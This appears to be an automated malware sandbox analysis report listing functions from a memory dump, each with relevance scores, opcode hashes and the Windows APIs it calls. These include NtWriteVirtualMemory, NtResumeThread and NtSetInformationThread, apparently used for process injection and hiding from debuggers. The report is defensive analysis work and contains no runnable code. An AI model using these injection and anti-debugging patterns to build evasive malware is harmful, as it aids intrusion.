Instruction ID: 2bd913d91de96566ab5974b02895390a0a3cef66eb2b5c2413b72da789f2c4fb
Opcode Fuzzy Hash: ebd943a8e8cb320ca1d67672f568f55d8ab69c67a38a9e3bdf44dbd29f67ed39
Instruction Fuzzy Hash: F83168B86C4316EFEF146E604D61BE937525F6A3A0F70422DEC625B2C0E7B4C841CA51

Uniqueness

Uniqueness Score: -1.00%

Function 021C550F, Relevance: 3.6, APIs: 2, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 0a72c90feb975c8460f056880ec920cf3bbe3c911f6a8ccbed99f4a4f34f2890
Instruction ID: c683c9ea15a80dce9147bae2b8d866d92c175883ce9127773d1ddc134e23f603
Opcode Fuzzy Hash: 0a72c90feb975c8460f056880ec920cf3bbe3c911f6a8ccbed99f4a4f34f2890
Instruction Fuzzy Hash: D4227D786C8301EFEF285E24CC94BA976A3AF32310FB5822DDD666B1D5C3749485CB52

Uniqueness

Uniqueness Score: -1.00%

Function 021C05B5, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000051,?,?,0000FFFF,?), ref: 021C0663

Strings

1.!T, xrefs: 021C0634

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: df16a819e2b25520cfb511857a573778293b20514a1e2d1095f5b45c6d7bf20d
Instruction ID: e0c269cde7c3decd0df42125d84e4543091a640383ad451c160f1cc31abaa448
Opcode Fuzzy Hash: df16a819e2b25520cfb511857a573778293b20514a1e2d1095f5b45c6d7bf20d
Instruction Fuzzy Hash: 142166BC7C4315EFFF142E604D91BE93B425FAA7A0F744228ED666B2C1E3A5C841CA51

Uniqueness

Uniqueness Score: -1.00%

Function 021C05D9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000051,?,?,0000FFFF,?), ref: 021C0663

Strings

1.!T, xrefs: 021C0634

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: 7b9819c3eb392284e57dd57179ad7c089c37095618f9f4d63a1bda8517f00718
Instruction ID: ecd93b9c3508e61202262946f426b0626629dc3cd2ecd24cd09a92b2a1eb8fbb
Opcode Fuzzy Hash: 7b9819c3eb392284e57dd57179ad7c089c37095618f9f4d63a1bda8517f00718
Instruction Fuzzy Hash: 04216BBC6C4325AEFF142E604D96FF97752AF6A764F744228FD226B1C1E3A0C840CA41

Uniqueness

Uniqueness Score: -1.00%

Function 021C0614, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000051,?,?,0000FFFF,?), ref: 021C0663

Strings

1.!T, xrefs: 021C0634

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: c8103d414e6ea91a25c1eb7b8d497efb0879b6aceb802d5feb1c98393911d4f4
Instruction ID: b505b896a6797fb9bd9c7f154c0270020376439105629760062c333c5b7c8587
Opcode Fuzzy Hash: c8103d414e6ea91a25c1eb7b8d497efb0879b6aceb802d5feb1c98393911d4f4
Instruction Fuzzy Hash: 37115BBC6C4325EEEF042E504D95BEA37025F6A7A4F74032CFC262B2C1D3A5C805CA90

Uniqueness

Uniqueness Score: -1.00%

Function 021C29E9, Relevance: 3.3, APIs: 2, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46b2d75e21d0e1ea9dfeacd3c71afd503311e8d1678ae251494bc845c03b3d32
Instruction ID: 96967c2e3cbc6a3271cf087b2c144c8c68a81f025ffaf8a1eaba0d777659232d
Opcode Fuzzy Hash: 46b2d75e21d0e1ea9dfeacd3c71afd503311e8d1678ae251494bc845c03b3d32
Instruction Fuzzy Hash: A0B1D0783C4205AFEF291E24CC45BE93AA2EF65710F71412DFE556A2D0C7B99894CB42

Uniqueness

Uniqueness Score: -1.00%

Function 021C16EC, Relevance: 2.0, APIs: 1, Instructions: 458COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 723c89a918eb766f807f4dad8aae41c8d100bdf036ad3b113fcf05e5e7867c24
Instruction ID: 12ca5f900d7aebd3d755f54d602e59225e64bba012fb6c434734a757038b3fdb
Opcode Fuzzy Hash: 723c89a918eb766f807f4dad8aae41c8d100bdf036ad3b113fcf05e5e7867c24
Instruction Fuzzy Hash: 49E114786C8306FFD7289E28CCA0BE573A2BF25350F75422DEC6A93241D735A855CB91

Uniqueness

Uniqueness Score: -1.00%

Function 021C51CF, Relevance: 1.9, APIs: 1, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d72efc6fb5efbd57faed6dcc4f5d2c143ab52c86e7da980823f2f979f1089c87
Instruction ID: 8a93e7825c7566cda8bba34ddd2efade7a487211245eff3cdaf117598cba7a1d
Opcode Fuzzy Hash: d72efc6fb5efbd57faed6dcc4f5d2c143ab52c86e7da980823f2f979f1089c87
Instruction Fuzzy Hash: B4E134797C4301BFEB291A24CC45BEA76A3AF61310FB5413DEE56662D0C7B9A4C4CA42

Uniqueness

Uniqueness Score: -1.00%

Function 021C1E2D, Relevance: 1.9, APIs: 1, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c65ab960787aa4a7b4e00e160b235ae83a7c3fd319a659ed0615cd263e4b9f
Instruction ID: 5573753a7874197038dccc674ab598faaea319ea80a26de8007257ba3568b6d1
Opcode Fuzzy Hash: 41c65ab960787aa4a7b4e00e160b235ae83a7c3fd319a659ed0615cd263e4b9f
Instruction Fuzzy Hash: A8E1F2783C4305AFEB295E24CC45BE936A2EF25310F72412DFE55AB1D1C7B99888CB52

Uniqueness

Uniqueness Score: -1.00%

Function 021C2CC8, Relevance: 1.8, APIs: 1, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1655ef0214181475105bc44b63e02d515ad14d31356332adda9d57d556b6b144
Instruction ID: 1ddb24a0c430758d35a1accf5621755a78d9549af5462ac0dda4054620782eca
Opcode Fuzzy Hash: 1655ef0214181475105bc44b63e02d515ad14d31356332adda9d57d556b6b144
Instruction Fuzzy Hash: 32B124783C0305AFEB291E24CC85BE936A6EF25714F72412DFE556B2D0C7B99884CB52

Uniqueness

Uniqueness Score: -1.00%

Function 021C1021, Relevance: 1.8, APIs: 1, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1722421fe960decb4e275ac6b8967fd9e728d77e13554e0d1ec9b605a3dbd8bc
Instruction ID: 865d42feec2cb29e952f47397e8d8d3fa15bb8e148d786fac4d57415f65354a2
Opcode Fuzzy Hash: 1722421fe960decb4e275ac6b8967fd9e728d77e13554e0d1ec9b605a3dbd8bc
Instruction Fuzzy Hash: 94B145783C4205AFFB291E20CD81BE93AA2BF25704F75412DFE556B2D0C7B99894CB46

Uniqueness

Uniqueness Score: -1.00%

Function 021C2AB9, Relevance: 1.8, APIs: 1, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c0f86173a371e9774e84b6596fce5c9ab3a7efde9d3da7e256f0cbd6b7ebb50
Instruction ID: 30b4bfc98ccbda7028be1ffeb4a916235d8b3515f9bde6eb451591bfc9ef156f
Opcode Fuzzy Hash: 7c0f86173a371e9774e84b6596fce5c9ab3a7efde9d3da7e256f0cbd6b7ebb50
Instruction Fuzzy Hash: 3FA113B83C4205AFFB291E20CC81BE93AA2AF25714F75413DFE556B2C0C7B95898CB45

Uniqueness

Uniqueness Score: -1.00%

Function 021C231C, Relevance: 1.8, APIs: 1, Instructions: 288sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: b0dd69af13d16db68ecfe52bd20403de2ba24fd917fc5a0a685b0ecdd4b4e3a7
Instruction ID: 32a8c6cdea898cda180d992130869537a315ce013694d1c1561350ccd3e6dc62
Opcode Fuzzy Hash: b0dd69af13d16db68ecfe52bd20403de2ba24fd917fc5a0a685b0ecdd4b4e3a7
Instruction Fuzzy Hash: 9A91F3B43C0205AFEB291E20CC85BE93AA2AF65700F75413CFE556B2D0C7B95898CB45

Uniqueness

Uniqueness Score: -1.00%

Function 021C2369, Relevance: 1.8, APIs: 1, Instructions: 283sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 75e02d49e76d4f890550096476cf877d0e3396365b1f7b77225861c6cecf7c4e
Instruction ID: 6085c5149c0134d8106c303ce250290f58b924fa7ec00c0d012008ab170fbc36
Opcode Fuzzy Hash: 75e02d49e76d4f890550096476cf877d0e3396365b1f7b77225861c6cecf7c4e
Instruction Fuzzy Hash: 5191F4B83C4205AFEB291E20CC85BE93AA2BF65704F75413CFE556B2D0C7B95898CB45

Uniqueness

Uniqueness Score: -1.00%

Function 021C236C, Relevance: 1.8, APIs: 1, Instructions: 268sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: fc2336241d8756f06a6b29cd5eb5850de63cfebc1c7851eafec5c623b4b4174f
Instruction ID: e40c7898ba2dea76882cbced516de0902c871f8f270812065dee901ab68ebb01
Opcode Fuzzy Hash: fc2336241d8756f06a6b29cd5eb5850de63cfebc1c7851eafec5c623b4b4174f
Instruction Fuzzy Hash: 7A91F2783C4205AFEB291E20CC95BE93AA2EF65700F65413DFE556B2D0C7B998D8CB41

Uniqueness

Uniqueness Score: -1.00%

Function 021C2390, Relevance: 1.8, APIs: 1, Instructions: 260sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 19712851155fe0e76ce3f1fbd4b14a37d64295cb2bd4f87b6a3a408a2b95d449
Instruction ID: 2c3d7c150cda6da620397447f799d9a97b2ccdda9ea932bafc94b2a7f2ee89c3
Opcode Fuzzy Hash: 19712851155fe0e76ce3f1fbd4b14a37d64295cb2bd4f87b6a3a408a2b95d449
Instruction Fuzzy Hash: 0691D2783C4209AFEB291E20CC95BE93AA6FF25700F65413DED5567290C7B998D8CB41

Uniqueness

Uniqueness Score: -1.00%

Function 021C23C9, Relevance: 1.7, APIs: 1, Instructions: 246sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: ebd1520f98bec1aaa138546432be1ff4b89b0effa584bc411f441715e31a234c
Instruction ID: 917c39bd98611cf6dc69b7c4b1eb3db42ba31a059b83469364310094867be5a4
Opcode Fuzzy Hash: ebd1520f98bec1aaa138546432be1ff4b89b0effa584bc411f441715e31a234c
Instruction Fuzzy Hash: 2381F3B83C4205AFEB291E20CC95BE97AA2FF25300F65413DED55A72D0C7B998D8CB41

Uniqueness

Uniqueness Score: -1.00%

Function 021C241D, Relevance: 1.7, APIs: 1, Instructions: 240sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 9b3492b7ab933d30e70f3042ffc64290f4723e671382d43c117191c20654b257
Instruction ID: ebad2c5d32f14123da132a6f6b8f797237e2762b7a7ceef2702a3cffc5078918
Opcode Fuzzy Hash: 9b3492b7ab933d30e70f3042ffc64290f4723e671382d43c117191c20654b257
Instruction Fuzzy Hash: CA8103B83C4205AFEB291E24DC91BE93AA2FF25300F65413DED556B2D0C7B998D8CB41

Uniqueness

Uniqueness Score: -1.00%

Function 021C23F9, Relevance: 1.7, APIs: 1, Instructions: 235sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 0249bed094a522527e74c2f4d149cbf698bdb117f84553584c0a96ff8cd5003f
Instruction ID: 41d9bce59bbc82e5d642f0ea9c4b3c50ba5097b0a8714a4260f37cf5f3fa45f3
Opcode Fuzzy Hash: 0249bed094a522527e74c2f4d149cbf698bdb117f84553584c0a96ff8cd5003f
Instruction Fuzzy Hash: FB81F3B43C4205AFEB291E20DC95BE97AA2FF25300F65413DED55AB2D0C7B998D8CB41

Uniqueness

Uniqueness Score: -1.00%

Function 021C2461, Relevance: 1.7, APIs: 1, Instructions: 221sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: d410ffaf3ed4d03863441e8989579e92fa3687af5e1c42a71afafe9beaf01140
Instruction ID: ced44a556b1a519289cbfc80bdb221b562437776416e6032243b5d9abbdaecdd
Opcode Fuzzy Hash: d410ffaf3ed4d03863441e8989579e92fa3687af5e1c42a71afafe9beaf01140
Instruction Fuzzy Hash: AF710374380205AFEB291E24CC91BE936A2FF25300F61412DFE55672D0C7B958D8CB41

Uniqueness

Uniqueness Score: -1.00%

Function 021C2495, Relevance: 1.7, APIs: 1, Instructions: 210sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 703b83082d2f43891a8f01d9e557bd57b3859386b1405594458bc3b7dc788073
Instruction ID: b9dfbd4ef3ca55f3e01ec4033e0023eddb5136b5983dbc56d281544fcce989c0
Opcode Fuzzy Hash: 703b83082d2f43891a8f01d9e557bd57b3859386b1405594458bc3b7dc788073
Instruction Fuzzy Hash: AB71D274384209AFEF291E10DC91BE976A2FF25300F65413DFD55A62D0C7B998D8CB81

Uniqueness

Uniqueness Score: -1.00%

Function 021C24BE, Relevance: 1.7, APIs: 1, Instructions: 203sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: d46605c2bad3be7aa1d437a2b449d3eea3562e5e33f3e065c13a679ae448b9cc
Instruction ID: 0fa1caebcad2485c70b6e48a4d6c04377e5eed0d22921282de1168b2af08ba02
Opcode Fuzzy Hash: d46605c2bad3be7aa1d437a2b449d3eea3562e5e33f3e065c13a679ae448b9cc
Instruction Fuzzy Hash: 3161F374280205AFEF291E10DC95BE97AA2FF25300F65413DFE45AB2D0C7B998D8DB81

Uniqueness

Uniqueness Score: -1.00%

Function 021C2514, Relevance: 1.7, APIs: 1, Instructions: 186sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: fa007077a3faf8dadad69292efc8d3e18734a8dcc17831cf6fe8b10b174ad816
Instruction ID: 68da0732e83aed66241dc551b7b43e1861a79dbcb7b6b631b4f9d50f890db959
Opcode Fuzzy Hash: fa007077a3faf8dadad69292efc8d3e18734a8dcc17831cf6fe8b10b174ad816
Instruction Fuzzy Hash: F55116783C4209AFEF391E20DC91BE93AA6EF28700F65403DFE85661D0C7B558D8DA42

Uniqueness

Uniqueness Score: -1.00%

Function 021C253D, Relevance: 1.7, APIs: 1, Instructions: 175sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 479ac952384b19a0db0b9c6ef9edb84555c6db23e17e0dceb28a3f449a2b1a60
Instruction ID: 64ea3c78e505e79ace32508f155c149585ca57ad03b036620e0e1ad6f783199b
Opcode Fuzzy Hash: 479ac952384b19a0db0b9c6ef9edb84555c6db23e17e0dceb28a3f449a2b1a60
Instruction Fuzzy Hash: DD51F7783C4209AFEF392E20DC91BE93696EF24700F65403DFE95A61D0C7B558D8DA42

Uniqueness

Uniqueness Score: -1.00%

Function 021C2539, Relevance: 1.7, APIs: 1, Instructions: 172sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 71db4d1502b034979a2efdb0ae4ab0e560a39793b0b6c35f21e3a2db2dd312b1
Instruction ID: 3655fe038adf4e569df7521920674842dacf91d89a3f9c6ebc814c83ccf97982
Opcode Fuzzy Hash: 71db4d1502b034979a2efdb0ae4ab0e560a39793b0b6c35f21e3a2db2dd312b1
Instruction Fuzzy Hash: EC5108782C4245AFEF391E20DC91BE936A2EF25300F65403DFE95961D0C7B958D8DA42

Uniqueness

Uniqueness Score: -1.00%

Function 021C25A9, Relevance: 1.7, APIs: 1, Instructions: 163sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: f311d907da4798f57d21ff0a5d487fcb383f20b711888d0b56019cef7211ae9e
Instruction ID: d08c2466169d34e8fcdf9f64ae310bbec7558de100f8ba580cf77f69024f0461
Opcode Fuzzy Hash: f311d907da4798f57d21ff0a5d487fcb383f20b711888d0b56019cef7211ae9e
Instruction Fuzzy Hash: 2851D5783C4209AFEF392E10DC91BE93696EF28700F65413DFE95A61D0C7B558D8DA42

Uniqueness

Uniqueness Score: -1.00%

Function 021C25AB, Relevance: 1.7, APIs: 1, Instructions: 152sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 5534d02f5ca572225421993258efb74eb116fe39dd6960ef5b901db7c0692d17
Instruction ID: f5ed02422920e92785838d7f629377dc374e875922c77b221dd122b7c51afc14
Opcode Fuzzy Hash: 5534d02f5ca572225421993258efb74eb116fe39dd6960ef5b901db7c0692d17
Instruction Fuzzy Hash: 6B51F678384209AFEF392E20DC81BE93696FF24300F65413DFE95A61D0C7B959D8DA42

Uniqueness

Uniqueness Score: -1.00%

Function 021C5F53, Relevance: 1.6, APIs: 1, Instructions: 139nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7a1ce54380b01aab31e853196332dd97c5345bc6748469624790a81aa560ebb2
Instruction ID: bc850990fd1a9bb19610cbe5d58579121bf219d97fbe4c632093cce02dc76c66
Opcode Fuzzy Hash: 7a1ce54380b01aab31e853196332dd97c5345bc6748469624790a81aa560ebb2
Instruction Fuzzy Hash: 6E416F3DA88286DEFF2C4E24C9443B8366ADBFA321FB6413DD827A61D5D334D484C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C25F7, Relevance: 1.6, APIs: 1, Instructions: 134sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 2ad289ae24b808be527b28edacc9f67430a3271636cb16947daf3dd3a45059fc
Instruction ID: 8d954c061c193f4fc07a28518512335987e9f41ac62785c9708b7739f7175a32
Opcode Fuzzy Hash: 2ad289ae24b808be527b28edacc9f67430a3271636cb16947daf3dd3a45059fc
Instruction Fuzzy Hash: D741F878284205AFEF392E24DCD0BE93A97FF25300F65413DFD5566190C77558D8DA42

Uniqueness

Uniqueness Score: -1.00%

Function 021C5F68, Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d0fe2c50388fdfe7ebfa33813eae1ea0a4f4af4379e72757ec30ae235bbe9d7
Instruction ID: d5ba08bf556f4c89df784919a9bf77352dfeaf882c358773a6eff296bf3acaaa
Opcode Fuzzy Hash: 7d0fe2c50388fdfe7ebfa33813eae1ea0a4f4af4379e72757ec30ae235bbe9d7
Instruction Fuzzy Hash: 60413C2DA88286DEFF2C4E14C9483B8366AEFF6321FB6416DD827A6195D334D484C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C5FA9, Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 321451d3c8975c25256b7f6404e20989c4f85901e0484a028e4d37fb201d7f02
Instruction ID: 3fb1d0c164439ef4c12d1efd6283112eb85afdf6f4971c4fb26b75acb1813856
Opcode Fuzzy Hash: 321451d3c8975c25256b7f6404e20989c4f85901e0484a028e4d37fb201d7f02
Instruction Fuzzy Hash: EA412C2DA8C286DEFF2C4E14C9443B8366AEFF6321FB6417DD827A6195D334D484C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C5FC1, Relevance: 1.6, APIs: 1, Instructions: 122nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

